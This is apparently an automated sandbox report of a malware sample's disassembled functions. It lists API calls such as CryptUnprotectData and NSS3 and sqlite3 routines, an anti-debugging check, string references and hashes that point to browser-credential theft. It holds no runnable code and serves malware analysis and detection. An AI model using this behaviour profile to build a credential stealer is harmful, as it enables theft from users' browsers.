Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: de169b6e81e8879e12ed03c05aad0e3e031fc12672cdd2dfc312c34d8ce9a00c
Instruction ID: 1d352c5d103f250a8ac4b35637eee961bb43dc390755d37d5bed7936f69aee52
Opcode Fuzzy Hash: de169b6e81e8879e12ed03c05aad0e3e031fc12672cdd2dfc312c34d8ce9a00c
Instruction Fuzzy Hash: 3D91B4716083228BEB15CF28C490F6AB7E1BF48714F56495DD995CB391E770EC44C792

Function 6D014540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D014571
memset.VCRUNTIME140(?,00000000,00000000), ref: 6D0145B1
memcpy.VCRUNTIME140(?,?,00000020), ref: 6D0145C2

Part of subcall function 6D0104C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6D01461B,-00000004), ref: 6D0104DF
Part of subcall function 6D0104C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6D01461B,-00000004), ref: 6D010534

PR_Now.NSS3 ref: 6D014626

Part of subcall function 6D049DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DC6
Part of subcall function 6D049DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D090A27), ref: 6D049DD1
Part of subcall function 6D049DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D049DED

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D014634
memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6D0146C4
PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6D0146E3
PR_SetError.NSS3(?,00000000), ref: 6D014722

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
String ID:
API String ID: 1183590942-0
Opcode ID: 4824f3c59b84642bf9167c583f666ed63c69f1bf463c00dc4881a03af323362d
Instruction ID: 7e14528fc83755986c13527abd944fb1478b9f991a2edf045b3cccd6a25084b7
Opcode Fuzzy Hash: 4824f3c59b84642bf9167c583f666ed63c69f1bf463c00dc4881a03af323362d
Instruction Fuzzy Hash: D661C1B1E046059FFB20CFA8DC80B6AB7F5BF5D318F458629E9459B261E730E944CB41

Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BEA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
TerminateProcess.KERNEL32(00000000), ref: 0041BEE5

Strings

eM, xrefs: 0041BEBD

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: eM
API String ID: 2579439406-4107679315
Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D

Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Strings

>O@, xrefs: 0040A224, 0040A231, 0040A249, 0040A268, 0040A234, 0040A26B

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O@
API String ID: 4291131564-3498640338
Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50

Function 6CF94420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6CF94444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CF94466

Part of subcall function 6CFE1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE1228
Part of subcall function 6CFE1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CFE1238
Part of subcall function 6CFE1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE124B
Part of subcall function 6CFE1200: PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0,00000000,00000000,00000000,?,6CF888A4,00000000,00000000), ref: 6CFE125D
Part of subcall function 6CFE1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CFE126F
Part of subcall function 6CFE1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CFE1280
Part of subcall function 6CFE1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CFE128E
Part of subcall function 6CFE1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CFE129A
Part of subcall function 6CFE1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CFE12A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF9447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF9448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CF94494

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: 534c7fe9ba3abd57ef20d3794fde292dc94a35b9e6cefab28ab0bb1ffe4f4580
Instruction ID: 33e2fbd6c6d7125f7f7faded089e661ec002271dbf8850151c6093009ba3335f
Opcode Fuzzy Hash: 534c7fe9ba3abd57ef20d3794fde292dc94a35b9e6cefab28ab0bb1ffe4f4580
Instruction Fuzzy Hash: 6011BBB2D007149BE720CF259C405A7B7F8FF592187094B3EEC9D52900F371B5948790

Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55

Function 6D09CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D09D086
PR_Malloc.NSS3(00000001), ref: 6D09D0B9
PR_Free.NSS3(?), ref: 6D09D138

Strings

>, xrefs: 6D09CF5B

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 1351c2cf0cec76149410d618956cb8922abb2164e99bc0483a65443b44c21ff5
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: E1D15822F946470BFB15487C88A13EE779397C2370F986329D5329F3E5E6198883A325

Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00

Strings

,<A, xrefs: 0041398D, 00413AE4, 00413AE7

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: ,<A
API String ID: 123533781-3158208111
Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50

Function 6CF1AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6CF1AE18
winUnlockReadLock, xrefs: 6CF1AE9F
pm, xrefs: 6CF1ADA7
Pm, xrefs: 6CF1ADDB, 6CF1ADF5, 6CF1AE6A
0m, xrefs: 6CF1ACC0, 6CF1AD22, 6CF1AD5E, 6CF1AE45

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID: 0m$Pm$pm$winUnlock$winUnlockReadLock
API String ID: 0-3685362890
Opcode ID: 027723509dd4e88e053ad26d04db494603e637c5ec62cf800f520213a691f1db
Instruction ID: 2e55d9d7ca5cd620aca307c40c3069066a03ccafa47048f00ab5315d9c679906
Opcode Fuzzy Hash: 027723509dd4e88e053ad26d04db494603e637c5ec62cf800f520213a691f1db
Instruction Fuzzy Hash: 62717D71608240ABEB04CF28D894BAABBF5FF89314F14CA1DFD9997641D730E985CB91

Function 6D03AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c12054bac98be76475b450726caca465370880ef5f2fd4e2cf76de41db51525
Instruction ID: b6511796bed7d2948cc36b8fcb17840627605386f03480d8087fc49bd698b9e0
Opcode Fuzzy Hash: 2c12054bac98be76475b450726caca465370880ef5f2fd4e2cf76de41db51525
Instruction Fuzzy Hash: 7BF1CE70E006678FEB04CF28D9447BEBBF5AB8A308F16812ED945D7354EB749991CB81

Function 6D0125B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6CFF5A85), ref: 6D012675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6D012659

Part of subcall function 6CFC3850: TlsGetValue.KERNEL32 ref: 6CFC389F
Part of subcall function 6CFC3850: EnterCriticalSection.KERNEL32(?), ref: 6CFC38B3
Part of subcall function 6CFC3850: PR_Unlock.NSS3(?), ref: 6CFC38F1
Part of subcall function 6CFC3850: TlsGetValue.KERNEL32 ref: 6CFC390F
Part of subcall function 6CFC3850: EnterCriticalSection.KERNEL32(?), ref: 6CFC3923
Part of subcall function 6CFC3850: PR_Unlock.NSS3(?), ref: 6CFC3972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D012697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6CFF5A85,?,6CFF5A85), ref: 6D012717

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: 5469c42ec8d5291679e93075b403e9c4f268955676fdb1c95b15e32a9ad8c493
Instruction ID: 81be34a855ae134ef8590c30dcf318e67dee1af55ac01e1110e8f2c49e7bbaaf
Opcode Fuzzy Hash: 5469c42ec8d5291679e93075b403e9c4f268955676fdb1c95b15e32a9ad8c493
Instruction Fuzzy Hash: F641C471A0C3816AFB358EA8CC82FEB73E8EFD6714F10851DE95447280EA7195C586D3

Function 00419030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9

Function 6CF68540 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 782COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000011C,automatic index on %s(%s),?,00000001), ref: 6CF68705

Strings

automatic index on %s(%s), xrefs: 6CF686FB
BINARY, xrefs: 6CF68B02, 6CF68DA2, 6CF68E27, 6CF68E60

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_log
String ID: BINARY$automatic index on %s(%s)
API String ID: 632333372-611788421
Opcode ID: 29830bae765cf1f8e22483365b343bbe18a07aff65e49d0a5ebf14e6dff639c1
Instruction ID: 8c921dd43653f4f952286f5042ba15e06a6dddc622bca8908df2e39376be709e
Opcode Fuzzy Hash: 29830bae765cf1f8e22483365b343bbe18a07aff65e49d0a5ebf14e6dff639c1
Instruction Fuzzy Hash: 83627D75A083519FD705CF29C480B1AB7F1BF8A348F148A5EE8999BB51D731EC46CB82

Function 6CF14DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CF15125
pm, xrefs: 6CF14E1C, 6CF14E81, 6CF14FDE, 6CF15047, 6CF150BB, 6CF151A3, 6CF1526C
Pm, xrefs: 6CF15019, 6CF150FA, 6CF15157, 6CF151DE, 6CF151F2, 6CF1520D, 6CF15220, 6CF152A2, 6CF152B5
0m, xrefs: 6CF14EDE, 6CF14F82

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
